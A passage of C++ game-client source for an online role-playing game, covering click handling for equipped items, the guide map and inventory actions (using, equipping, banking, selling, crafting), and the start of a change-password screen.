	for (i = 0; i < DEF_MAXITEMEQUIPPOS; i++)
		cEquipPoiStatus[i] = -1;

	for (i = 0; i < DEF_MAXITEMS; i++) {
		if ((m_pItemList[i] != NULL) && (m_bIsItemEquipped[i] == TRUE))	cEquipPoiStatus[ m_pItemList[i]->m_cEquipPos ] = i;
	}
	if ((m_sPlayerType >= 1) && (m_sPlayerType <= 3))
	{
		if (cEquipPoiStatus[DEF_EQUIPPOS_BACK] != -1) {
			sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BACK]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BACK]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison( sX + 41, sY + 137, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_BACK];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_PANTS] != -1) {
			sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_PANTS]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_PANTS]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_PANTS];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_ARMS] != -1) {
			sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_ARMS]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_ARMS]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_ARMS];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_BOOTS] != -1) {
			sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_BOOTS];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_BODY] != -1) {
			sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BODY]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BODY]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_BODY];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY] != -1) {
			sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_LHAND] != -1) {
			sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LHAND]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LHAND]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 90, sY + 170, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_LHAND];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_RHAND] != -1) {
			sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RHAND]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RHAND]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 57, sY + 186, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_RHAND];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND] != -1) {
			sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 57, sY + 186, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_NECK] != -1) {
			sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_NECK]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_NECK]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 35, sY + 120, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_NECK];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_RFINGER] != -1) {
			sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RFINGER]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RFINGER]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 32, sY + 193, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_RFINGER];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_LFINGER] != -1) {
			sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LFINGER]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LFINGER]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 90, sY + 175, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_LFINGER];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_HEAD] != -1) {
			sSprH      = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_HEAD]]->m_sSprite;
			sFrame     = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_HEAD]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->_bCheckCollison(sX + 72, sY + 135, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_HEAD];
		}
	}
	else if ((m_sPlayerType >= 4) && (m_sPlayerType <= 6)) {
		if (cEquipPoiStatus[DEF_EQUIPPOS_BACK] != -1) {
			sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BACK]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BACK]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 45, sY + 143, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_BACK];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_BOOTS] != -1) {
			sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_BOOTS];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_PANTS] != -1) {
			sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_PANTS]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_PANTS]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_PANTS];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_ARMS] != -1) {
			sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_ARMS]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_ARMS]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_ARMS];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_BOOTS] != -1) {
			sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_BOOTS];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_BODY] != -1) {
			sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BODY]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BODY]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_BODY];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY] != -1) {
			sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_LHAND] != -1) {
			sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LHAND]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LHAND]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 84, sY + 175, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_LHAND];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_RHAND] != -1) {
			sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RHAND]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RHAND]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 60, sY + 191, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_RHAND];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND] != -1) {
			sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 60, sY + 191, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_NECK] != -1) {
			sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_NECK]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_NECK]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 35, sY + 120, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_NECK];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_RFINGER] != -1) {
			sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RFINGER]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RFINGER]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 32, sY + 193, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_RFINGER];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_LFINGER] != -1) {
			sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LFINGER]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LFINGER]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 90, sY + 175, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_LFINGER];
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_HEAD] != -1) {
			sSprH  = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_HEAD]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_HEAD]]->m_sSpriteFrame;
			if( m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH +40]->_bCheckCollison(sX + 72, sY + 139, sFrame, msX, msY ) )
				cItemID = cEquipPoiStatus[DEF_EQUIPPOS_HEAD];
		}
	}

	if( cItemID == -1 || m_pItemList[cItemID] == NULL ) return;
	if ( (m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_EAT) || (m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_CONSUME) || (m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_ARROW) || (m_pItemList[cItemID]->m_dwCount > 1) ) return;
	if ( (m_bIsDialogEnabled[11]==TRUE) && (m_bIsDialogEnabled[23] == FALSE) && (m_stDialogBoxInfo[39].sV3 == 24))
		bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQ_REPAIRITEM, NULL, cItemID, m_stDialogBoxInfo[39].sV3, NULL, m_pItemList[cItemID]->m_cName, m_stDialogBoxInfo[39].sV4); // v1.4
	else {
		if (m_bIsItemEquipped[m_stMCursor.sSelectedObjectID] == TRUE)
		{	char cStr1[64], cStr2[64], cStr3[64];
			GetItemName(m_pItemList[m_stMCursor.sSelectedObjectID], cStr1, cStr2, cStr3);
			ZeroMemory(G_cTxt, sizeof(G_cTxt) );
			wsprintf(G_cTxt, ITEM_EQUIPMENT_RELEASED, cStr1);//"
			AddEventList(G_cTxt, 10);
			if(memcmp(m_pItemList[m_stMCursor.sSelectedObjectID]->m_cName, "AngelicPandent(STR)", 19) == 0) PlaySound('E', 53, 0);
			else if(memcmp(m_pItemList[m_stMCursor.sSelectedObjectID]->m_cName, "AngelicPandent(DEX)", 19) == 0) PlaySound('E', 53, 0);
			else if(memcmp(m_pItemList[m_stMCursor.sSelectedObjectID]->m_cName, "AngelicPandent(INT)", 19) == 0) PlaySound('E', 53, 0);
			else if(memcmp(m_pItemList[m_stMCursor.sSelectedObjectID]->m_cName, "AngelicPandent(MAG)", 19) == 0) PlaySound('E', 53, 0);
			else PlaySound('E', 29, 0);
			// Remove Angelic Stats
			if (   (m_pItemList[m_stMCursor.sSelectedObjectID]->m_cEquipPos >= 11)
				&& (m_pItemList[m_stMCursor.sSelectedObjectID]->m_cItemType == 1))
			{	char cItemID = m_stMCursor.sSelectedObjectID;
				if(memcmp(m_pItemList[cItemID]->m_cName, "AngelicPandent(STR)", 19) == 0)
				{	m_iAngelicStr = 0;
				}else if(memcmp(m_pItemList[cItemID]->m_cName, "AngelicPandent(DEX)", 19) == 0)
				{	m_iAngelicDex = 0;
				}else if(memcmp(m_pItemList[cItemID]->m_cName, "AngelicPandent(INT)", 19) == 0)
				{	m_iAngelicInt = 0;
				}else if(memcmp(m_pItemList[cItemID]->m_cName, "AngelicPandent(MAG)", 19) == 0)
				{	m_iAngelicMag = 0;
			}	}
			bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_RELEASEITEM, NULL, m_stMCursor.sSelectedObjectID, NULL, NULL, NULL);
			m_bIsItemEquipped[m_stMCursor.sSelectedObjectID] = FALSE;
			m_sItemEquipmentStatus[	m_pItemList[m_stMCursor.sSelectedObjectID]->m_cEquipPos ] = -1;
			m_stMCursor.cSelectedObjectType	= NULL;
			m_stMCursor.sSelectedObjectID   = NULL;
	}	}
}

void CGame::DlbBoxDoubleClick_GuideMap(short msX, short msY)
{short si = m_stMCursor.sCursorFrame;
	if( si != 0 ) return;
	if( m_cMapIndex < 0 ) return;

	short sX, sY, shX, shY, szX, szY;
	sX = m_stDialogBoxInfo[9].sX;
	sY = m_stDialogBoxInfo[9].sY;
	szX = m_stDialogBoxInfo[9].sSizeX;
	szY = m_stDialogBoxInfo[9].sSizeY;
	if( sX < 20 ) sX = 0;
	if( sY < 20 ) sY = 0;

	//LifeX Fix Map
	if (sX > 400) sX = 800 - 128;
	if (sY > 273) sY = 547 - 128;

	if( m_bZoomMap )
	{	shX = m_sPlayerX-64;
		shY = m_sPlayerY-64;
		if( shX < 0 ) shX = 0;
		if( shY < 0 ) shY = 0;
		if( shX > m_pMapData->m_sMapSizeX-128 ) shX = m_pMapData->m_sMapSizeX-128;
		if( shY > m_pMapData->m_sMapSizeY-128 ) shY = m_pMapData->m_sMapSizeY-128;
		shX = shX + msX - sX;
		shY = shY + msY - sY;
	}else
	{	shX = (m_pMapData->m_sMapSizeX*(msX-sX))/128;
		shY = (m_pMapData->m_sMapSizeX*(msY-sY))/128;
	}
	if( shX < 30 || shY < 30 ) return;
	if( shX > m_pMapData->m_sMapSizeX-30 || shY > m_pMapData->m_sMapSizeY-30 ) return;
	if( (m_bRunningMode==TRUE) && (m_iSP>0) )
		m_cCommand = DEF_OBJECTRUN;
	else m_cCommand = DEF_OBJECTMOVE;
	m_sCommX = shX;
	m_sCommY = shY;
	GetPlayerTurn();
}

void CGame::DlbBoxDoubleClick_Inventory(short msX, short msY)
{
 int i;
 char  cItemID, cTxt[120];
 short sX, sY, x1, x2, y1, y2;
 char cStr1[64], cStr2[64], cStr3[64];
	if (m_bItemUsingStatus == TRUE)
	{	
		AddEventList(BDLBBOX_DOUBLE_CLICK_INVENTORY1, 10);
		return;
	}
	sX = m_stDialogBoxInfo[2].sX;
	sY = m_stDialogBoxInfo[2].sY;
	for (i = 0; i < DEF_MAXITEMS; i++)
	{	if (m_cItemOrder[DEF_MAXITEMS - 1 - i] == -1) continue;
		cItemID = m_cItemOrder[DEF_MAXITEMS - 1 - i];
		if (m_pItemList[cItemID] == NULL) continue;

		m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->_GetSpriteRect(sX + 32 + m_pItemList[cItemID]->m_sX, sY + 44 + m_pItemList[cItemID]->m_sY, m_pItemList[cItemID]->m_sSpriteFrame);
		// Order
		x1 = (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_rcBound.left;
		y1 = (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_rcBound.top;
		x2 = (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_rcBound.right;
		y2 = (short)m_pSprite[DEF_SPRID_ITEMPACK_PIVOTPOINT + m_pItemList[cItemID]->m_sSprite]->m_rcBound.bottom;

		if ((m_bIsItemDisabled[cItemID] == FALSE) && (m_bIsItemEquipped[cItemID] == FALSE) && (msX > x1) && (msX < x2) && (msY > y1) && (msY < y2))
		{	// Order
			_SetItemOrder(0, cItemID);
			GetItemName(m_pItemList[cItemID], cStr1, cStr2, cStr3);

			if ( m_bIsDialogEnabled[11] && (m_bIsDialogEnabled[23] == FALSE) && (m_bIsDialogEnabled[23] == FALSE) && (m_stDialogBoxInfo[39].sV3 == 24) )
			{	if (m_pItemList[cItemID]->m_cEquipPos != DEF_EQUIPPOS_NONE)
				{	bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQ_REPAIRITEM, NULL, cItemID, m_stDialogBoxInfo[39].sV3, NULL, m_pItemList[cItemID]->m_cName, m_stDialogBoxInfo[39].sV4); // v1.4
					return;
			}	}

			/* Cuando te metes al wh, y abrs el panel para meter items, no hace falta que los arrastres, 
			les vas dando doble click y se te van metiendo solos. Eso hace el code, solo cuando estas dentro del wh y 
			abrs el panel del mismo. */
			if(m_bIsDialogEnabled[14])
            {
                bItemDrop_Bank(msX, msY);
                return;
            }
			else if (m_bIsDialogEnabled[31])
			{
				//centu3 - sell item
				bItemDrop_SellList(msX, msY);
				return;
			}
			else if (m_bIsDialogEnabled[34])
			{
				//centu3 - upgrade item
				bItemDrop_ItemUpgrade();
				return;
			}

			if (   (m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_USE_DEPLETE)
				|| (m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_USE_PERM)
				|| (m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_ARROW)
				|| (m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_EAT) )
			{	if (bCheckItemOperationEnabled(cItemID) == FALSE) return;
				if ((timeGetTime() - m_dwDamagedTime) < 10000)
				{	if ((m_pItemList[cItemID]->m_sSprite == 6) && (m_pItemList[cItemID]->m_sSpriteFrame == 9))
					{	wsprintf(G_cTxt, BDLBBOX_DOUBLE_CLICK_INVENTORY3, cStr1);//"Item %s: Scrolls cannot be used until 10 seconds after taking damage."
						AddEventList(G_cTxt, 10);
						return;
					}
					if ((m_pItemList[cItemID]->m_sSprite == 6) && (m_pItemList[cItemID]->m_sSpriteFrame == 89))
					{	wsprintf(G_cTxt, BDLBBOX_DOUBLE_CLICK_INVENTORY3, cStr1);//"Item %s: Scrolls cannot be used until 10 seconds after taking damage."
						AddEventList(G_cTxt, 10);
						return;
				}	}
				bSendCommand(MSGID_COMMAND_COMMON, DEF_COMMONTYPE_REQ_USEITEM, NULL, cItemID, NULL, NULL, NULL);

				if (   (m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_USE_DEPLETE)
					|| (m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_EAT) )
				{	m_bIsItemDisabled[cItemID] = TRUE;
					m_bItemUsingStatus = TRUE;
			}	}

			if ( m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_USE_SKILL )
			{	if (_bIsItemOnHand() == TRUE)
				{	AddEventList(BDLBBOX_DOUBLE_CLICK_INVENTORY4, 10);//"Your hands should be free to use this item."
					return;
				}
				if (m_bSkillUsingStatus == TRUE)
				{	AddEventList(BDLBBOX_DOUBLE_CLICK_INVENTORY5, 10);//"You are already using another skill."
					return;
				}
				if (m_pItemList[cItemID]->m_wCurLifeSpan == 0)
				{	AddEventList(BDLBBOX_DOUBLE_CLICK_INVENTORY6, 10);//"You can't use this item because it is exhausted."
				}else
				{	m_bIsGetPointingMode = TRUE;
					m_iPointCommandType  = cItemID;
					wsprintf(cTxt, BDLBBOX_DOUBLE_CLICK_INVENTORY7, cStr1);//"Item %s: Select a position which you want to use."
					AddEventList(cTxt, 10);
			}	}

			if ( m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_USE_DEPLETE_DEST )
			{	if (_bIsItemOnHand() == TRUE)
				{	AddEventList(BDLBBOX_DOUBLE_CLICK_INVENTORY4, 10);//"Your hands should be free to use this item."
					return;
				}
				if (m_bSkillUsingStatus == TRUE)
				{	AddEventList(BDLBBOX_DOUBLE_CLICK_INVENTORY13, 10);//"You are already using another skill."
					return;
				}
				if (m_pItemList[cItemID]->m_wCurLifeSpan == 0)
				{	AddEventList(BDLBBOX_DOUBLE_CLICK_INVENTORY6, 10);//"You can't use this item because it is exhausted."
				}else
				{	m_bIsGetPointingMode = TRUE;
					m_iPointCommandType  = cItemID;
					wsprintf(cTxt, BDLBBOX_DOUBLE_CLICK_INVENTORY8, cStr1);//"Item %s: Select an item which you want to use."
					AddEventList(cTxt, 10);
			}	}

			if (m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_USE_SKILL_ENABLEDIALOGBOX)
			{	if (_bIsItemOnHand() == TRUE)
				{	AddEventList(BDLBBOX_DOUBLE_CLICK_INVENTORY4, 10);//"Your hands should be free to use this item."
					return;
				}

				if (m_bSkillUsingStatus == TRUE) {
					AddEventList(BDLBBOX_DOUBLE_CLICK_INVENTORY5, 10);//"You are already using another skill."
					return;
				}

				if (m_pItemList[cItemID]->m_wCurLifeSpan == 0)
				{	AddEventList(BDLBBOX_DOUBLE_CLICK_INVENTORY6, 10);//"You can't use this item because it is exhausted."
				}else
				{	switch (m_pItemList[cItemID]->m_sSpriteFrame) {
					case 55: // Alchemy pot
						if (m_cSkillMastery[12] == 0)
						{	AddEventList(BDLBBOX_DOUBLE_CLICK_INVENTORY9, 10);//"You should learn alchemy skill to use this item."
						}else
						{	EnableDialogBox(26, 1, NULL, NULL, NULL);
							AddEventList(BDLBBOX_DOUBLE_CLICK_INVENTORY10, 10);//"Using alchemy skill..."
						}
						break;
					case 113: // Smith's Anvil
						if (m_cSkillMastery[13] == 0)
						{	AddEventList(BDLBBOX_DOUBLE_CLICK_INVENTORY11, 10);//"You should learn manufacturing skill to use this item.."
						}else
						{	EnableDialogBox(26, 3, NULL, NULL, NULL);
							AddEventList(BDLBBOX_DOUBLE_CLICK_INVENTORY12, 10);//"Using a manufacturing skill..."
						}
						break;

					// Crafting
					case 0:
						{	EnableDialogBox(26, 7, NULL, NULL, NULL);
							AddEventList(BDLBBOX_DOUBLE_CLICK_INVENTORY17, 10);	//  "Initiating item Crafting..."
						}
						break;

					case 151:
					case 152:
					case 153:
					case 154:
							EnableDialogBox(40, 1, NULL, NULL, NULL);
						break;
			}	}	}
			// Dblclick Alchemy bowl
			if (( m_bIsDialogEnabled[26] == TRUE) && (m_stDialogBoxInfo[26].cMode == 1))
			{	bItemDrop_SkillDialog();
			}
			// Dblclick Manuf box
			if (( m_bIsDialogEnabled[26] == TRUE) && (m_stDialogBoxInfo[26].cMode == 4))
			{	bItemDrop_SkillDialog();
			}
			// Crafting
			// Dblclick Crafting box
			if (( m_bIsDialogEnabled[26] == TRUE) && (m_stDialogBoxInfo[26].cMode == 7))
			{	bItemDrop_SkillDialog();
			}
			if (m_pItemList[cItemID]->m_cItemType == DEF_ITEMTYPE_EQUIP)
			{	m_stMCursor.cSelectedObjectType = DEF_SELECTEDOBJTYPE_ITEM;
				m_stMCursor.sSelectedObjectID = (short)cItemID;
				bItemDrop_Character();
				m_stMCursor.cSelectedObjectType = NULL;
				m_stMCursor.sSelectedObjectID   = NULL;
			}
			return;
	}	}
}


void CGame::UpdateScreen_OnChangePassword()
{
 short msX, msY, msZ;
 char cLB, cRB;
 char cMIresult;
 int  iMIbuttonNum;
 static class CMouseInterface * pMI;
 static char  cName[12], cPassword[12], cNewPassword[12], cNewPassConfirm[12], cPrevFocus; 
 static DWORD dwCTime;
 DWORD dwTime = timeGetTime();
 BOOL bFlag = TRUE;

	if (m_cGameModeCount == 0) {
		EndInputString();

		pMI = new class CMouseInterface;
		pMI->AddRect(300+SCREENX, 148 + SCREENY, 425 + SCREENX, 170 + SCREENY);
		pMI->AddRect(300 + SCREENX, 172 + SCREENY, 425 + SCREENX, 194 + SCREENY);
		pMI->AddRect(300 + SCREENX, 196 + SCREENY, 425 + SCREENX, 218 + SCREENY);
		pMI->AddRect(300 + SCREENX, 220 + SCREENY, 425 + SCREENX, 242 + SCREENY);

		pMI->AddRect(197 + SCREENX, 320 + SCREENY, 197 + DEF_BTNSZX + SCREENX, 320 + DEF_BTNSZY + SCREENY);
		pMI->AddRect(370 + SCREENX, 320 + SCREENY, 370 + DEF_BTNSZX + SCREENX, 320 + DEF_BTNSZY + SCREENY);

		cPrevFocus  = 2; //1
		m_cCurFocus = 2; //1
		m_cMaxFocus = 6;
		m_bEnterPressed = FALSE;
		m_cArrowPressed = 0;

		ZeroMemory(cName, sizeof(cName));
		ZeroMemory(cPassword, sizeof(cPassword));
		ZeroMemory(cNewPassword, sizeof(cNewPassword));
